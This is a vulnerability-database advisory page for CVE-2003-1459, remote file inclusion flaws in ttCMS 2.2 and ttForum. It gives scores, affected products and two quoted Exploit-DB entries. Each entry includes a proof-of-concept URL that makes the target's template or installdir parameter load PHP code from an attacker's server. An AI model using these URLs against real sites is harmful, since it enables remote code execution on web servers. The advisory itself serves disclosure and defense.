CVE-2003-1459
published 2003-12-31CVE-2003-1459: Multiple PHP remote file inclusion vulnerabilities in ttCMS 2.2 and ttForum allow remote attackers to execute arbitrary PHP code via the (1) template parameter…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
7.07%
93.4th percentile
Multiple PHP remote file inclusion vulnerabilities in ttCMS 2.2 and ttForum allow remote attackers to execute arbitrary PHP code via the (1) template parameter in News.php or (2) installdir parameter in install.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ttcms | ttcms | — | — |
| ttcms | ttforum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion
exploitdb·2003-05-09
CVE-2003-1459 ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion
ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/7542/info
A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.
Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.
There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.
http://www.example.com/ttforum/index.php?action=news;board=1;
template=http://www.yourserver.com/modules/forum/helpadmin;ex
Exploit-DB
ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion
exploitdb·2003-05-09
CVE-2003-1459 ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion
ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/7542/info
A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.
Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.
There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.
http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php
No writeups or analysis indexed.
http://securityreason.com/securityalert/3278http://www.securityfocus.com/archive/1/321000http://www.securityfocus.com/bid/7542https://exchange.xforce.ibmcloud.com/vulnerabilities/12271http://securityreason.com/securityalert/3278http://www.securityfocus.com/archive/1/321000http://www.securityfocus.com/bid/7542https://exchange.xforce.ibmcloud.com/vulnerabilities/12271
2003-12-31
Published